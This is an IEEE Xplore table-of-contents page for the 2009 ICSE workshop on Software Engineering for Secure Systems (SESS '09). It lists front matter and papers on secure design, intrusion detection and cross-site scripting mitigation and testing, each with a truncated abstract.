By Topic

Software Engineering for Secure Systems, 2009. SESS '09. ICSE Workshop on

Date 19-19 May 2009

Filter Results

Displaying Results 1 - 22 of 22
  • [USB label]

    Publication Year: 2009, Page(s): c1
    Request permission for commercial reuse | PDF file iconPDF (273 KB)
    Freely Available from IEEE
  • Welcome

    Publication Year: 2009, Page(s): c2
    Request permission for commercial reuse | PDF file iconPDF (163 KB)
    Freely Available from IEEE
  • Hub page

    Publication Year: 2009, Page(s): 1
    Request permission for commercial reuse | PDF file iconPDF (105 KB)
    Freely Available from IEEE
  • Table of contents

    Publication Year: 2009, Page(s): 1
    Request permission for commercial reuse | PDF file iconPDF (35 KB)
    Freely Available from IEEE
  • Author index

    Publication Year: 2009, Page(s):1 - 2
    Request permission for commercial reuse | PDF file iconPDF (19 KB)
    Freely Available from IEEE
  • Detailed author index

    Publication Year: 2009, Page(s):1 - 4
    Request permission for commercial reuse | PDF file iconPDF (31 KB)
    Freely Available from IEEE
  • The end of indexes

    Publication Year: 2009, Page(s): 1
    Request permission for commercial reuse | PDF file iconPDF (27 KB)
    Freely Available from IEEE
  • [PDF Reader FAQ and support]

    Publication Year: 2009, Page(s): 1
    Request permission for commercial reuse | PDF file iconPDF (18 KB)
    Freely Available from IEEE
  • [PDF Reader FAQ and support]

    Publication Year: 2009, Page(s):1 - 4
    Request permission for commercial reuse | PDF file iconPDF (418 KB)
    Freely Available from IEEE
  • Release

    Publication Year: 2009, Page(s): 1
    Request permission for commercial reuse | PDF file iconPDF (70 KB)
    Freely Available from IEEE
  • [Title page]

    Publication Year: 2009, Page(s): 1
    Request permission for commercial reuse | PDF file iconPDF (41 KB)
    Freely Available from IEEE
  • Organizing Committee

    Publication Year: 2009, Page(s): 1
    Request permission for commercial reuse | PDF file iconPDF (57 KB)
    Freely Available from IEEE
  • Reusable security use cases for mobile grid environments

    Publication Year: 2009, Page(s):1 - 8
    Cited by:  Papers (1)
    Request permission for commercial reuse | Click to expandAbstract | PDF file iconPDF (443 KB) | HTML iconHTML

    Due to the growing complexity of software development, developing software through systematic processes is becoming more and more important. Likewise, it is important that the development process used integrates security aspects from the first stages at the same level as other functional and non-functional requirements. In the last years, GRID technology has shown to be the most important one and ... View full abstract»

    Full text access may be available. Click article title to sign in or learn about subscription options.
  • Resolving least privilege violations in software architectures

    Publication Year: 2009, Page(s):9 - 16
    Cited by:  Papers (4)
    Request permission for commercial reuse | Click to expandAbstract | PDF file iconPDF (371 KB) | HTML iconHTML

    Supporting a security principle, such as least privilege, in a software architecture is difficult. Systematic rules are lacking, no guidance explains how to apply the principle in practice. As a result, security principles are often neglected. This lowers the overall security level of the software system and the cost of fixing such problems later on in the development cycle is high. We propose an ... View full abstract»

    Full text access may be available. Click article title to sign in or learn about subscription options.
  • Intrusion detection using signatures extracted from execution profiles

    Publication Year: 2009, Page(s):17 - 24
    Cited by:  Papers (1)
    Request permission for commercial reuse | Click to expandAbstract | PDF file iconPDF (231 KB) | HTML iconHTML

    An application based intrusion detection system is a security mechanism designed to detect malicious behavior that could compromise the security of a software application. Our aim is to develop such a system that operates on signatures extracted from execution profiles. These signatures are not descriptions of exploits, but instead are descriptions of the program conditions that lead to the exploi... View full abstract»

    Full text access may be available. Click article title to sign in or learn about subscription options.
  • A hybrid analysis framework for detecting web application vulnerabilities

    Publication Year: 2009, Page(s):25 - 32
    Cited by:  Papers (3)  |  Patents (1)
    Request permission for commercial reuse | Click to expandAbstract | PDF file iconPDF (316 KB) | HTML iconHTML

    Increasingly, web applications handle sensitive data and interface with critical back-end components, but are often written by poorly experienced programmers with low security skills. The majority of vulnerabilities that affect web applications can be ascribed to the lack of proper validation of user's input, before it is used as argument of an output function. Several program analysis techniques ... View full abstract»

    Full text access may be available. Click article title to sign in or learn about subscription options.
  • SWAP: Mitigating XSS attacks using a reverse proxy

    Publication Year: 2009, Page(s):33 - 39
    Cited by:  Papers (20)
    Request permission for commercial reuse | Click to expandAbstract | PDF file iconPDF (171 KB) | HTML iconHTML

    Due to the increasing amount of Web sites offering features to contribute rich content, and the frequent failure of Web developers to properly sanitize user input, cross-site scripting prevails as the most significant security threat to Web applications. Using cross-site scripting techniques, miscreants can hijack Web sessions, and craft credible phishing sites. Previous work towards protecting ag... View full abstract»

    Full text access may be available. Click article title to sign in or learn about subscription options.
  • Metamodel for privacy policies within SOA

    Publication Year: 2009, Page(s):40 - 46
    Cited by:  Papers (5)
    Request permission for commercial reuse | Click to expandAbstract | PDF file iconPDF (254 KB) | HTML iconHTML

    As service-oriented architecture (SOA) continues to grow as a viable approach to systems development, so too does the number of services available. The strength of services in an SOA environment to provide interoperability comes at the cost of reduced privacy, as more interactions between autonomous services require more information to be exchanged. In this paper we define a metamodel for privacy ... View full abstract»

    Full text access may be available. Click article title to sign in or learn about subscription options.
  • MUTEC: Mutation-based testing of Cross Site Scripting

    Publication Year: 2009, Page(s):47 - 53
    Cited by:  Papers (19)  |  Patents (1)
    Request permission for commercial reuse | Click to expandAbstract | PDF file iconPDF (145 KB) | HTML iconHTML

    Cross Site Scripting (XSS) is one of the worst vulnerabilities that allow malicious attacks such as cookie thefts and Web page defacements. Testing an implementation against XSS vulnerabilities (XSSVs) can avoid these consequences. Obtaining an adequate test data set is essential for testing of XSSVs. An adequate test data set contains effective test cases that can reveal XSSVs. Unfortunately, tra... View full abstract»

    Full text access may be available. Click article title to sign in or learn about subscription options.
  • RUP-based process model for security requirements engineering in value-added service development

    Publication Year: 2009, Page(s):54 - 60
    Cited by:  Papers (1)
    Request permission for commercial reuse | Click to expandAbstract | PDF file iconPDF (164 KB) | HTML iconHTML

    Due to the spreading of SMS services and appearing of new business models, value-added SMS services have been introduced. According to the research results about wide distribution of security incidents on ICT systems worldwide, in spite of known security solutions, there is a necessity for organizational approach to implement security. This paper presents research and development efforts in buildi... View full abstract»

    Full text access may be available. Click article title to sign in or learn about subscription options.
  • Improving perimeter security with security-oriented program transformations

    Publication Year: 2009, Page(s):61 - 67
    Cited by:  Papers (3)
    Request permission for commercial reuse | Click to expandAbstract | PDF file iconPDF (274 KB) | HTML iconHTML

    A security-oriented program transformation maps programs to security-augmented programs, i.e. it introduces a protection mechanism to make programs more secure. Our previous work defined security-oriented program transformations [6], introduced a catalog of transformations [8], and showed how program transformations could be applied to systematically eradicate various types of data injection attac... View full abstract»

    Full text access may be available. Click article title to sign in or learn about subscription options.
  • Generating formal specifications for security-critical applications - A model-driven approach

    Publication Year: 2009, Page(s):68 - 74
    Cited by:  Papers (9)
    Request permission for commercial reuse | Click to expandAbstract | PDF file iconPDF (354 KB) | HTML iconHTML

    The SecureMDD approach aims to generate both, a formal specification for verification and executable code, from UML diagrams. The UML models define the static as well as dynamic components of the system under development. This model-driven approach is focused on security-critical applications that are based on cryptographic protocols, especially Java Card applications. In this paper we describe th... View full abstract»

    Full text access may be available. Click article title to sign in or learn about subscription options.